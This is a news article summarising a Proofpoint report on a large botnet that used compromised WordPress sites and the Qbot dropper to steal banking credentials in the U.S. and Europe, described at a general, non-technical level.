Researchers Analyze Massive Botnet Targeting Banking Customers in U.S., Europe

Researchers at Proofpoint have released an analysis of a 500,000-strong botnet used by a cybercrime ring to target banking customers in the United States and Europe. 

According to Proofpoint, the botnet has stolen online banking credentials for as many as 800,000 accounts, some 59 percent of which were at five of the largest banks in the U.S.

“Based on information gleaned from the attacker’s control panels, such as language preferences and the language of the server names and documentation, as well as from further research, the attackers behind this operation appear to be a Russian cybercrime group whose primary motivation is financial,” according to the report. “While the primary targets appear to be financial accounts and online banking information, the group also has a range of options for further monetization of the infected computers.”

The attackers compromised WordPress sites using purchased lists of administrator logins. They used those logins to upload malware to legitimate sites in order to then infect clients that visited these sites. Many of these sites also run newsletters that the attackers leverage to distribute legitimate – but infected – content.

The compromised sites contain or link to a Traffic Direction System (TDS) filter, which checks to ensure the victim’s browser is a target. If it is, the TDS will merge in content from an exploit server. Otherwise the TDS will be silent.

Next, the attackers exploit a browser or plugin vulnerability and infect the user with the malware dropper Qbot, which generates an unique identifier for each infection and drops additional malware.

More than half of the infected systems are Windows XP machines, while 39 percent run Windows 7.

“When end users browse the web sites compromised by the attackers, the scripts that the attackers added to the compromised site’s page will cause the visiting browsers to ultimately load and run unwanted software in a manner that is completely transparent to the end user,” according to the report.

The cybercrime group used compromised PCs to offer a sophisticated, paid proxying service for other organized crime groups that turns infected PCs into a ‘private cloud’ as well as infiltration points into corporate networks.

“The operations of this Russian cybercrime group exemplify both the sophisticated attack chain and the key challenges of modern threats,” according to the report. “While attackers rely on a variety of means to connect with potential victims, compromised web sites are a critical component in the attack chain. Attackers have the financial and technical means to infect an almost unlimited number of legitimate web sites, above and beyond the more easily identifiable malicious or suspicious sites that traditional defenses are designed to detect and block.”

“Moreover, the attack chain does not simply deliver a single piece of malware onto an infected system and stop at that,” the report continues. “Instead, it is designed to establish a foothold on the system so that any number of different pieces of malicious software can be downloaded in order to carry out criminal activities ranging from banking account theft to secret communications and transfers, to distributed denial of service (DDoS), to ransomware and any other activity that represents an opportunity to monetize that infected system.”

The report can be viewed here.